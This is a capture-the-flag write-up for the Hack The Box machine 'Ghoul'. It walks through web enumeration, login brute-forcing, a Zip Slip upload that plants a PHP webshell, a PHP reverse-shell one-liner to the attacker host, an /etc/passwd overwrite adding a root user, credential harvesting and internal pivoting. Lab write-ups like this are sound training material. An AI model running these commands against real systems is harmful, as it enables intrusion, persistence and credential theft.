Hack The Box - Ghoul

Quick Summary

Hey guys, today Ghoul retired and here’s my write-up about it. It was a very hard box with a lot of rabbit holes, tons of enumeration and a lot of pivoting. However I enjoyed most parts of the box and learned some new stuff. It’s a Linux box and its ip is 10.10.10.101 , I added it to /etc/hosts as ghoul.htb . Let’s jump right in !



Nmap

As always we will start with nmap to scan for open ports and services :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

root@kali:~/Desktop/HTB/boxes/ghoul# nmap -sV -sT -sC -o nmapinitial ghoul.htb

Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-04 12:47 EET

Nmap scan report for ghoul.htb (10.10.10.101)

Host is up (0.22s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 c1:1c:4b:0c:c6:de:ae:99:49:15:9e:f9:bc:80:d2:3f (RSA)

|_ 256 a8:21:59:7d:4c:e7:97:ad:78:51:da:e5:f0:f9:ab:7d (ECDSA)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: Aogiri Tree

2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 63:59:8b:4f:8d:0a:e1:15:44:14:57:27:e7:af:fb:3b (RSA)

| 256 8c:8b:a0:a8:85:10:3d:27:07:51:29:ad:9b:ec:57:e3 (ECDSA)

|_ 256 9a:f5:31:4b:80:11:89:26:59:61:95:ff:5c:68:bc:a7 (ED25519)

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_ Basic realm=Aogiri

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat/7.0.88 - Error report

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 39.96 seconds



We got two ssh ports 22,2222 and two http ports 80,8080. Let’s check the first http port.

Initial Web Enumeration

By going to http://ghoul.htb we see a basic static website with nothing really interesting :



So I ran gobuster with the extensions php and html :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

root@kali:~/Desktop/HTB/boxes/ghoul# gobuster -u http://ghoul.htb/ -w /usr/share/wordlists/dirb/common.txt -x php,html



=====================================================

Gobuster v2.0.1 OJ Reeves (@TheColonial)

=====================================================

[+] Mode : dir

[+] Url/Domain : http://ghoul.htb/

[+] Threads : 10

[+] Wordlist : /usr/share/wordlists/dirb/common.txt

[+] Status codes : 200,204,301,302,307,403

[+] Extensions : php,html

[+] Timeout : 10s

=====================================================

2019/10/04 12:53:49 Starting gobuster

=====================================================

/.hta (Status: 403)

/.hta.php (Status: 403)

/.hta.html (Status: 403)

/.htaccess (Status: 403)

/.htaccess.php (Status: 403)

/.htaccess.html (Status: 403)

/.htpasswd (Status: 403)

/.htpasswd.php (Status: 403)

/.htpasswd.html (Status: 403)

/archives (Status: 301)

/blog.html (Status: 200)

/contact.html (Status: 200)

/css (Status: 301)

/images (Status: 301)

/index.html (Status: 200)

/index.html (Status: 200)

/js (Status: 301)

/secret.php (Status: 200)

/server-status (Status: 403)

/uploads (Status: 301)

/users (Status: 301)



/secret.php and /users look interesting.

/secret.php :



Of course this user flag was just a troll, but there are two interesting things here, first one is Noro asking Kaneki for access and Kaneki replying with ILoveTouka which looks like a password. The other thing is the fake art site Kaneki talked about which is probably the site running on port 8080.

/users :



ILoveTouka didn’t work as a password so I tried to bruteforce the password with the username admin and I got it ( abcdef ) :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

root@kali:~/Desktop/HTB/boxes/ghoul# wfuzz --hh 1073 -c -u http://ghoul.htb/users/login.php -X POST -d "Username=admin&Password=FUZZ&Submit=Login" -w ./darkweb2017-top10000.txt



Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.



********************************************************

* Wfuzz 2.3.4 - The Web Fuzzer *

********************************************************



Target: http://ghoul.htb/users/login.php

Total requests: 10000



==================================================================

ID Response Lines Word Chars Payload

==================================================================



000242: C=302 0 L 0 W 0 Ch "abcdef"

000311: C=200 37 L 81 W 1073 Ch "12345qwert"^C

Finishing pending requests...



However this was just another troll :





I couldn’t find anything else on port 80 so I checked port 8080. It had basic http authentication :



But it was easily guessable, admin : admin :





This is the fake art website Kaneki was talking about, and we can upload images. But we can also upload zip archives :



Arbitrary File Write (Zip Slip) –> RCE

The ability to upload zip archives can cause a vulnerability known as zip slip. This happens when the archive has files with directory traversal paths in their names. During extraction, if the target is vulnerable it will write the extracted files to the specified paths in their names.

We need to put a shell in /var/www/html , so I copied simple-backdoor.php to /var/www/html then I added it to a zip archive using a lot of ../ before the file path :

1

2

3

4

5

6

7

8

root@kali:~/Desktop/HTB/boxes/ghoul# cd /var/www/html/

root@kali:/var/www/html# cp /usr/share/webshells/php/simple-backdoor.php ./shell.php

root@kali:/var/www/html# zip shell.zip ../../../../../../../../../../var/www/html/shell.php

adding: ../../../../../../../../../../var/www/html/shell.php (deflated 35%)

root@kali:/var/www/html# cd -

/root/Desktop/HTB/boxes/ghoul

root@kali:~/Desktop/HTB/boxes/ghoul# mv /var/www/html/shell.zip .

root@kali:~/Desktop/HTB/boxes/ghoul#



This is the easiest way to do it, let’s look at the file with vi , you’ll see the file name :



When this zip is extracted on the machine it will put shell.php in /var/www/html .





The shell was successfully uploaded :



Now we can simply get a reverse shell, the usual nc shell didn’t work because nc wasn’t installed on the box so I used php instead :

1

php -r '$sock=fsockopen("10.10.xx.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");'







Privilege Escalation on Aogiri, User Flag

First thing I did after getting a shell was to get a stable shell :

1

2

3

4

5

6

7

8

9

10

$ which python

/usr/bin/python

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@Aogiri:/var/www/html$ ^Z

[1]+ Stopped nc -lvnp 1337

root@kali:~/Desktop/HTB/boxes/ghoul# stty raw -echo

root@kali:~/Desktop/HTB/boxes/ghoul# nc -lvnp 1337



www-data@Aogiri:/var/www/html$ export TERM=screen

www-data@Aogiri:/var/www/html$



Then I checked /home , www-data couldnt access any of the directories :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

www-data@Aogiri:/var/www/html$ cd /home/

www-data@Aogiri:/home$ ls -la

total 36

drwxr-xr-x 1 root root 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

drwx------ 1 Eto Eto 4096 Dec 13 2018 Eto

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 kaneki

drwx------ 1 noro noro 4096 Dec 13 2018 noro

www-data@Aogiri:/home$ cd Eto/

bash: cd: Eto/: Permission denied

www-data@Aogiri:/home$ cd kaneki/

bash: cd: kaneki/: Permission denied

www-data@Aogiri:/home$ cd noro/

bash: cd: noro/: Permission denied

www-data@Aogiri:/home$ cd -

/var/www/html

www-data@Aogiri:/var/www/html$



So I had to escalate. By looking at the shell I uploaded I saw that it was created by root :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

www-data@Aogiri:/var/www/html$ ls -la

total 352

drwxr-xr-x 1 root root 4096 Oct 4 11:17 .

drwxr-xr-x 1 root root 4096 Jan 22 2019 ..

drwxr-xr-x 1 root root 4096 Dec 13 2018 archives

-r-xr-xr-x 1 root root 10723 Dec 13 2018 blog.html

-r-xr-xr-x 1 root root 8977 Dec 13 2018 contact.html

dr-xr-xr-x 1 root root 4096 Dec 13 2018 css

-r-xr-xr-x 1 root root 37906 Dec 13 2018 eto.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 images

-r-xr-xr-x 1 root root 11000 Dec 13 2018 index.html

dr-xr-xr-x 1 root root 4096 Dec 13 2018 js

-r-xr-xr-x 1 root root 13721 Dec 13 2018 kaneki-ken.jpg

-rw-r--r-- 1 root root 239 Dec 13 2018 kaneki.html

-r-xr-xr-x 1 root root 112642 Dec 13 2018 kaneki.jpg

-r-xr-xr-x 1 root root 134 Dec 13 2018 kaneki.php

-r-xr-xr-x 1 root root 13721 Dec 13 2018 ken.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 less

-r-xr-xr-x 1 root root 18457 Dec 13 2018 noro.jpg

-r-xr-xr-x 1 root root 4865 Dec 13 2018 secret.php

-rw-r--r-- 1 root root 328 Oct 4 11:17 shell.php

-r-xr-xr-x 1 root root 18159 Dec 13 2018 tatara.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 uploads

dr-xr-xr-x 1 root root 4096 Dec 13 2018 users

www-data@Aogiri:/var/www/html$



So I tried to use the zip exploit again to overwrite /etc/passwd , but first I had to create the passwd file. I copied the one from the box :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

www-data@Aogiri:/var/www/html$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

www-data@Aogiri:/var/www/html$



I used openssl to generate the hash of the password ( AAAA ) :

1

2

root@kali:~/Desktop/HTB/boxes/ghoul# openssl passwd AAAA

gDlPrjU6SWeKo



Then I added a new user called rooot with the the uid 0 to the passwd file :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

root@kali:~/Desktop/HTB/boxes/ghoul# echo "rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash" >> passwd

root@kali:~/Desktop/HTB/boxes/ghoul# cat passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

root@kali:~/Desktop/HTB/boxes/ghoul#



After that I created the zip file like I did before :

1

2

3

4

5

6

7

8

9

10

root@kali:~/Desktop/HTB/boxes/ghoul# cd /etc/

root@kali:/etc# mv passwd passwd.1

root@kali:/etc# cp ~/Desktop/HTB/boxes/ghoul/passwd .

root@kali:/etc# cd -

/root/Desktop/HTB/boxes/ghoul

root@kali:~/Desktop/HTB/boxes/ghoul# zip passwd.zip ../../../../../../../../etc/passwd

adding: ../../../../../../../../etc/passwd (deflated 62%)

root@kali:~/Desktop/HTB/boxes/ghoul# rm /etc/passwd

root@kali:~/Desktop/HTB/boxes/ghoul# mv /etc/passwd.1 /etc/passwd

root@kali:~/Desktop/HTB/boxes/ghoul#



Then I uploaded it :



Now we can do su rooot and use AAAA as a password :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

www-data@Aogiri:/var/www/html$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

www-data@Aogiri:/var/www/html$ su rooot

Password:

root@Aogiri:/var/www/html# id

uid=0(root) gid=0(root) groups=0(root)

root@Aogiri:/var/www/html#



And I could get the user flag from /home/kaneki :



We owned user.

Enumeration, Pivoting from Aogiri to kaneki-pc

After getting root I couldn’t find the root flag :

1

2

3

4

5

6

7

8

9

10

11

12

13

root@Aogiri:/home/kaneki# cd /root/

root@Aogiri:~# ls -la

total 48

drwx------ 1 root root 4096 Apr 28 14:17 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rw-r--r-- 1 root root 3106 Dec 13 2018 .bashrc

drwx------ 1 root root 4096 Dec 13 2018 .cache

-rw-r--r-- 1 root root 148 Dec 13 2018 .profile

-rw-r--r-- 1 root root 0 Jan 22 2019 .selected_editor

drw------- 1 root root 4096 Dec 13 2018 .ssh

-rw------- 1 root root 12094 Apr 28 14:17 .viminfo

root@Aogiri:~#



So I started to enumerate the home directories, web and configuration files.

Every user had some notes (hints) in their home directory :

Eto :

1

2

3

4

5

6

7

8

9

10

11

12

13

root@Aogiri:/home/Eto# ls -al

total 40

drwx------ 1 Eto Eto 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 Eto Eto 220 Dec 13 2018 .bash_logout

-rwx------ 1 Eto Eto 3771 Dec 13 2018 .bashrc

-rwx------ 1 Eto Eto 807 Dec 13 2018 .profile

drwx------ 1 Eto Eto 4096 Dec 13 2018 .ssh

-rwx------ 1 Eto Eto 92 Dec 13 2018 alert.txt

root@Aogiri:/home/Eto# cat alert.txt

Hey Noro be sure to keep checking the humans for IP logs and chase those little shits down!

root@Aogiri:/home/Eto#



kaneki :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

root@Aogiri:/home/kaneki# ls -al

total 92

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 kaneki kaneki 220 Dec 13 2018 .bash_logout

-rwx------ 1 kaneki kaneki 3771 Dec 13 2018 .bashrc

-rwx------ 1 kaneki kaneki 807 Dec 13 2018 .profile

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .ssh

-rw------- 1 kaneki kaneki 1802 Dec 13 2018 .viminfo

-rw------- 1 kaneki kaneki 148 Dec 13 2018 note.txt

-rwx------ 1 kaneki kaneki 136 Dec 13 2018 notes

-rwx------ 1 kaneki kaneki 39382 Dec 13 2018 secret.jpg

-rwx------ 1 kaneki kaneki 33 Dec 13 2018 user.txt

root@Aogiri:/home/kaneki# cat note.txt

Vulnerability in Gogs was detected. I shutdown the registration function on our server, please ensure that no one gets access to the test accounts.

root@Aogiri:/home/kaneki# cat notes

I've set up file server into the server's network ,Eto if you need to transfer files to the server can use my pc.

DM me for the access.

root@Aogiri:/home/kaneki#



noro :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

root@Aogiri:/home# cd noro/

root@Aogiri:/home/noro# ls -al

total 40

drwx------ 1 noro noro 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 noro noro 220 Dec 13 2018 .bash_logout

-rwx------ 1 noro noro 3771 Dec 13 2018 .bashrc

-rwx------ 1 noro noro 807 Dec 13 2018 .profile

drwx------ 1 noro noro 4096 Dec 13 2018 .ssh

-rwx------ 1 noro noro 24 Dec 13 2018 to-do.txt

root@Aogiri:/home/noro# cat to-do.txt

Need to update backups.

root@Aogiri:/home/noro#



I could also get ssh info for the 3 users :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

root@Aogiri:/home/Eto/.ssh# ls -al

total 28

drwx------ 1 Eto Eto 4096 Dec 13 2018 .

drwx------ 1 Eto Eto 4096 Dec 13 2018 ..

-rwx------ 1 Eto Eto 392 Dec 13 2018 authorized_keys

-rwx------ 1 Eto Eto 1675 Dec 13 2018 id_rsa

-rwx------ 1 Eto Eto 392 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/Eto/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzKoGE8Z9QDJDlC52zJFtQHHvZGxXgLi8fnYCOCi6GvuDV+ZNt3krFCwbkn02HAExvj1J9GXkPbZGNwMlYOYNZPqVOT7RRJML9yQNKxl4FW2IX4R23DPN17i/vjF4Gyjkk05H+P4QXsk34KZ71SOT+KMGTJ2tpV+VUKAl6jlMJM5ahDAPgrA6k2DOLk+oRF4c7Riwc2xz3/PNI/EJR8MMK5tP8bp6NUPt2AtCLO495dBFeGX6I164G5csjxxJKx5mzgjJsv5BL0l4H0RvLobDoXF++Lm3r580R6dVFsSlkC7TLJ8oscreVs6cfanQwc0E7zs61dipl5q9ceW1XWK/J Eto@Aogiri

root@Aogiri:/home/Eto/.ssh# cd ../../kaneki/.ssh/

root@Aogiri:/home/kaneki/.ssh# ls -la

total 28

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 ..

-rwx------ 1 kaneki kaneki 797 Dec 13 2018 authorized_keys

-rwx------ 1 kaneki kaneki 1766 Dec 13 2018 id_rsa

-rwx------ 1 kaneki kaneki 395 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/kaneki/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhK6T0d7TXpXNf2anZ/02E0NRVKuSWVslhHaJjUYtdtBVxCJg+wv1oFGPij9hgefdmFIKbvjElSr+rMrQpfCn6v7GmaP2QOjaoGPPX0EUPn9swnReRgi7xSKvHzru/ESc9AVIQIaeTypLNT/FmNuyr8P+gFLIq6tpS5eUjMHFyd68SW2shb7GWDM73tOAbTUZnBv+z1fAXv7yg2BVl6rkknHSmyV0kQJw5nQUTm4eKq2AIYTMB76EcHc01FZo9vsebBnD0EW4lejtSI/SRC+YCqqY+L9TZ4cunyYKNOuAJnDXncvQI8zpE+c50k3UGIatnS5f2MyNVn1l1bYDFQgYl kaneki_pub@kaneki-pc

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@Aogiri

root@Aogiri:/home/kaneki/.ssh# cd ../../noro/.ssh/

root@Aogiri:/home/noro/.ssh# ls -al

total 28

drwx------ 1 noro noro 4096 Dec 13 2018 .

drwx------ 1 noro noro 4096 Dec 13 2018 ..

-rwx------ 1 noro noro 393 Dec 13 2018 authorized_keys

-rwx------ 1 noro noro 1675 Dec 13 2018 id_rsa

-rwx------ 1 noro noro 393 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/noro/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAIchqQ1i+uOQ4jckHbO8sdtks3Cm6Ygie9youcFvqH6rBSxqWdQn8PdQ/HgrXN+RvED28aRC0kkzACL79gx9RGS4/kxqZBlPyP9mu7BWmC1J0NLACws0mvinztpixUaNj2w4WaBBe2+MpfeRoo9Abk4sBcZC7De6ZZl6RRqrdsb1kTZSWMXyxIOJMZrc+3dAc5+faujSkyeVbudjSlLf3g8xis/uSE3OvGhF4ypYDGDSRYbLY8oScDNU0eQexGMXYcY10z5f69hnrvaZ8wkvTKXwqHoMpgtjBz5NxewnY6UqhdMn0LkEeZdtK6UPRHdfSwoxjOgSyjaEmhU013d+p noro@Aogiri

root@Aogiri:/home/noro/.ssh#



In kaneki ‘s authorized_keys there was a public key for kaneki_pub@kaneki-pc , with that and the hints about kaneki ‘s pc and the other file server it was obvious that we need to pivot to another host. But before that I could find some passwords in /var/www/html/users/login.php :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

session_start();



if ( isset ($_POST[ 'Submit' ])){



$logins = array ( 'kaneki' => '123456' , 'noro' => 'password123' , 'admin' => 'abcdef' );





$Username = isset ($_POST[ 'Username' ]) ? $_POST[ 'Username' ] : '' ;

$Password = isset ($_POST[ 'Password' ]) ? $_POST[ 'Password' ] : '' ;





if ( isset ($logins[$Username]) && $logins[$Username] == $Password){



$_SESSION[ 'UserData' ][ 'Username' ]=$logins[$Username];

header( "location:index.php" );

exit ;

} else {



$msg= "<span style='color:red'>Invalid Login Details</span>" ;

}

}





And in /usr/share/tomcat7/conf/tomcat-users.xml :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46



































< tomcat-users >















































< user username = "admin" password = "admin" roles = "admin" />

< role rolename = "admin" />





</ tomcat-users >



123456 , password123 and test@aogiri123 . Maybe we’ll need them later.

I checked the other interfaces :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

root@Aogiri:/home/noro# ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.20.0.10 netmask 255.255.0.0 broadcast 172.20.255.255

ether 02:42:ac:14:00:0a txqueuelen 0 (Ethernet)

RX packets 54427 bytes 10267568 (10.2 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 49877 bytes 43322005 (43.3 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

loop txqueuelen 1000 (Local Loopback)

RX packets 467 bytes 46415 (46.4 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 467 bytes 46415 (46.4 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



root@Aogiri:/home/noro#



Aogiri ‘s ip on eth0 is 172.20.0.10 . We need to know what other hosts are live on that subnet so we will do a simple ping sweep :

1

2

3

4

5

root@Aogiri:~# for i in {1..255}; do ping -c 1 172.20.0.$i; done | grep 'ttl='

64 bytes from 172.20.0.1: icmp_seq=0 ttl=64 time=0.109 ms

64 bytes from 172.20.0.10: icmp_seq=0 ttl=64 time=0.066 ms

64 bytes from 172.20.0.150: icmp_seq=0 ttl=64 time=0.272 ms

root@Aogiri:~#



We got 172.20.0.150 we need to scan it for open ports, neither nmap nor nc was installed so I got a static version of nc and uploaded it :

1

2

3

4

5

6

7

8

9

root@Aogiri:/tmp# wget http://10.10.xx.xx/nc

--2019-10-04 13:05:16-- http://10.10.xx.xx/nc

Connecting to 10.10.xx.xx:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959800 (937K) [application/octet-stream]

Saving to: ‘nc’

nc 100%[=====================================================================================================================>] 937.30K 242KB/s in 5.3s

2019-10-04 13:05:22 (177 KB/s) - ‘nc’ saved [959800/959800]

root@Aogiri:/tmp#



I scanned the first 1000 ports and ssh was open :

1

2

3

root@Aogiri:/tmp# ./nc -zv 172.20.0.150 1-1000

64978af526b2.Aogiri [172.20.0.150] 22 (ssh) open

root@Aogiri:/tmp#



Assuming that 172.20.0.150 is kaneki-pc we can use kaneki ‘s private key to ssh as kaneki_pub . But there was a problem, the key is encrypted :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,9E9E4E88793BC9DB54A767FC0216491F



wqcYgOwX3V511WRuXWuRheYyzo5DelW+/XsBtXoL8/Ow7/Tj4EC4dKCfas39HQW8

MNbTv51gYxQ/Vc3W1jEYSyxTCYAu600naUhX3+En7P8kje2s0I4VEZX0MJqgB/pv

J9nPBtbXcqV6/v6Vkbc5kGtMiRVMYzS9KWiCOafveFQCr1orYmnNINsZou4AWrfB

Ofr63sUVD8V1Rabnoltbo+pePXnQ6HqjpO1b2qCyUQBxDxwSFT5a+j5YvMYV3JXK

HOo4D0fcMoBVT46pXga6wZtiB4XgeM/iB/xg6YfdfMPuDBJ6+fqZMjlm+GvEexkl

EEtJAqoSG/yCOjedByVqmfKye9DaIY9Um2WkWcX1bVRlYktYtpb755aDmVVoQjb5

CmW4yuLapjqUrGEFY+ghLLRdZvSBPZ18PbUgVMqpdmrfnEy48d22IGPJ6ZO2L4qR

FzLjkQkjFRgkrBJ9bSzYS/NYZ8QGQh/wk3BHaupjLxD2j1Ta7PXwCjh4zBZNPO/e

9VN9c+b/zwYSyyeKcJ8dhFEH26j5g93EnWTkdLEMyw6tRbdzhQbNo02WWDTvWPJv

+6A+6xA6/+NxacHXfyfxQ+l8CsmpZ5CgKjKHfFeDYZHyoPhcthKkL3Go3rqZ1HOb

MimhTR3wOUwoV/XaVcCvW+5LwPh1ljdnHCjaY2VzKns4/X+2dZtOsDz5aCovN7mM

eHsRuIEVKtZ2EijKfYZGtDaDwTd/1YTDooGdDDdDipr8bTDvD14r07Yk/xrfjEUp

V9+v3PzmD1trqIlFw+7D8ogFsXJ/P+raVFWaihQWEeqOnGXEhHQ0afgcVt9w62tV

